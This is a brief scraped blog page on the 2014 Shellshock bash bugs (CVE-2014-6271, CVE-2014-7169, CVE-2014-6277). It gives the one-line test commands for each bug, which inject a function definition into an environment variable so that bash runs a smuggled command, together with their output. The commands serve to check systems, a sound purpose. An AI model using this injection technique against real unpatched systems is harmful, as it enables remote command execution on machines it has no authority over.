1989

CVE-2014-6271

the original Shellshock

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

CVE-2014-7169

aka AfterShock

$ env var='() {(a)=>\' bash -c "echo date"; cat echo
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Tue Oct  7 02:09:01 EDT 2014

CVE-2014-6277

still not fixed

$ var='() { echo vulnerable; }' bash -c var
vulnerable

CVE-2014-6271

btmills

CVE-2014-6271

0 0

shellshock

1989

CVE-2014-6271

CVE-2014-7169

CVE-2014-6277

CVE-2014-6271

btmills

CVE-2014-6271

0 0 (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

shellshock

1989

CVE-2014-6271

CVE-2014-7169

CVE-2014-6277

0 0